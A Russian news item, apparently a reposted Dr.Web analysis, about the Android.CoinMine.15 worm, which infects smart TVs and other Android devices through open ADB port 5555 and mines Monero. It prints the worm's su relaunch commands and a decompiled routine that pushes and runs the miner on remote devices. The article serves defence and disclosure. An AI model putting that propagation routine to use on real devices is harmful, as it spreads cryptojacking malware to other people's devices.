Около 8% умных телевизоров и устройств на Android уязвимы для нового майнера

Около 8% умных телевизоров и устройств на Android уязвимы для нового майнера

Информация о распространении троянца Android.CoinMine.15, известного также под названием ADB.miner, появилась несколько дней назад в блоге китайской компании, работающей в сфере информационной безопасности.


По данным китайских исследователей, скорость распространения троянца в активный период была очень велика: ежедневно количество инфицированных устройств возрастало вдвое. Специалисты «Доктор Веб» полагают, что большинство зараженных устройств – «умные» телевизоры, поскольку именно они, как правило, имеют постоянное подключение к Интернету с использованием ADB.

Этот Android-троянец, предназначенный для добычи криптовалюты Monero, способен инфицировать другие устройства без участия пользователя. Вредоносная программа Android.CoinMine.15 заражает Android-устройства с открытым портом 5555, который используется интерфейсом отладчика Android Debug Bridge (ADB). Инфицированными могут оказаться не только «умные» телевизоры, но также смартфоны, планшеты, телевизионные приставки, роутеры, медиаплееры и ресиверы – то есть устройства, использующие отладку по сети. Еще одним потенциально уязвимым устройством является одноплатный компьютер Raspberry Pi 3 с установленной ОС Android.

Распространение троянца происходит следующим образом. С другого зараженного устройства на атакуемый узел устанавливается приложение droidbot.apk, а также файлы с именами nohup, sss и bot.dat. Затем файл sss запускается с помощью утилиты nohup и в процессе работы становится демоном. После этого он извлекает из bot.dat другие компоненты троянца, в том числе конфигурационный файл в формате JSON, приложения-майнеры (для 32- и 64-разрядной версии ОС) и экземпляр троянской программы droidbot. После запуска droidbot в непрерывном цикле случайным образом генерирует IP-адрес и пытается подключиться к порту 5555. В случае успеха троянец предпринимает попытку заразить обнаруженное устройство с использованием интерфейса отладчика ADB. В отдельном потоке Android.CoinMine.15 запускает приложение-майнер, предназначенное для добычи криптовалюты Monero (XMR). Заражение подобными вредоносными программами может привести к заметному снижению быстродействия устройства, его нагреву, а также быстрому расходованию ресурса аккумулятора.

В ОС Android отладчик ADB по умолчанию отключен, однако некоторые производители все же оставляют его включенным. Кроме того, ADB по каким-либо причинам может быть включен самим пользователем — чаще всего режим отладки необходим разработчикам программ. Согласно статистике, собранной Dr.Web для Android, отладчик Android Debug Bridge включен на 8% устройств, защищенных нашим антивирусом. Поскольку такая настройка может представлять потенциальную угрозу, специальный компонент Dr.Web – Аудитор безопасности – предупреждает пользователя о включенном отладчике и предлагает отключить его.



Специалисты компании «Доктор Веб» рекомендуют всем владельцам Android-устройств выполнить проверку операционной системы на предмет потенциально опасных настроек. Для этого на нашем сайте или в официальном каталоге Google Play можно приобрести Dr.Web Security Space для Android, в состав которого входит Аудитор безопасности. Если на вашем устройстве включена, но не используется отладка по USB, лучше эту функцию отключить. Троянец-майнер Android.CoinMine.15 детектируется и удаляется антивирусными программами Dr.Web для Android, поэтому не представляет угрозы для наших пользователей.





Специальное предложение - Корпоративный антивирус Dr.Web Enterprise Security Suite с выгодой до 60%

- УЗНАТЬ ПОДРОБНЕЕ.




А теперь подробнее о самом троянце - Android.CoinMine.15

Добавлен в вирусную базу Dr.Web:2018-02-07
Описание добавлено:2018-02-08

SHA1: c4e13a96b3eb308f88b3d1e16ea65bffcfb39fb0


Основной компонент червя, предназначенного для добычи на инфицированном Android-устройстве криптовалюты Monero (XMR).


С целью контроля повторного запуска droidbot выполняет команду "ps | grep droidbot". Если копия droidbot уже запущена, второй экземпляр процесса завершает свою работу. Затем приложение запускает файл "/data/local/tmp/invoke.sh", после чего удаляет следующие файлы:

/data/local/tmp/invoke.sh
/data/local/tmp/ddexe
/data/local/tmp/debuggerd
/data/local/tmp/install-recovery.sh

Затем droidbot проверяет, обладает ли его процесс правами суперпользователя (root). Если нет, но на устройстве присутствуют утилиты "/system/bin/su" или "/system/xbin/su", droidbot запускает свою копию с помощью su, а исходный процесс завершает:


su -c /data/local/tmp/nohup /data/local/tmp/droidbot
/data/local/tmp/nohup /data/local/tmp/droidbot


Если процесс запущен с правами суперпользователя, он создает два потока: в одном пытается инфицировать другие устройства, а в другом проверяет значение "ro.product.cpu.abi" в "/system/build.prop" с целью определения разрядности операционной системы. В зависимости от полученного результата запускает соответствующую версию майнера: "/data/local/tmp/xmrig64", или ""/data/local/tmp/xmrig32".

В непрерывном цикле троянец случайным образом генерирует IP-адрес и пытается подключиться к порту 5555. Он отсылает специальным образом сформированный пакет и проверяет ответ на него. В случае удачного соединения пытается взломать удаленное устройство следующим образом:


int __fastcall CheckAndInstall(char *szIP)
{
  char *v1; // r4
  signed int v2; // r5
  v1 = szIP;
  AdbConnect(szIP);
  if ( !AdbGetState(v1) )
  {
    puts("[+] get devices");
    v2 = AdbPsGrep(v1, "droidbot");
    if ( !(AdbCat(v1, "/data/local/tmp/botsuinit_1_1.txt") | v2) )
    {
      puts("[+] our bin is running");
      goto LABEL_5;
    }
    AdbRmRf(v1, "/data/local/tmp/");
    AdbInstall(v1, "/data/local/tmp/droidbot.apk");
    AdbAmStart(v1, "com.android.good.miner/com.example.test.MainActivity");
    AdbPush(v1, "/data/local/tmp/sss", "/data/local/tmp/");
    AdbPush(v1, "/data/local/tmp/nohup", "/data/local/tmp/");
    AdbPush(v1, "/data/local/tmp/bot.dat", "/data/local/tmp/");
    AdbChmod(v1, "/data/local/tmp/sss");
    AdbChmod(v1, "/data/local/tmp/nohup");
    AdbChmod(v1, "/data/local/tmp/bot.dat");
    AdbShell(v1, "/data/local/tmp/nohup", "/data/local/tmp/sss");
    sleep(30);
  }
  AdbDisconnect();
LABEL_5:
  pthread_cond_signal(&unk_348EC);
  return 0;
}



Рекомендации по лечению

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.



Купить антивирус Dr.Web для Android, Windows и других операционных систем.




 04.06.2018
 (127 просмотров)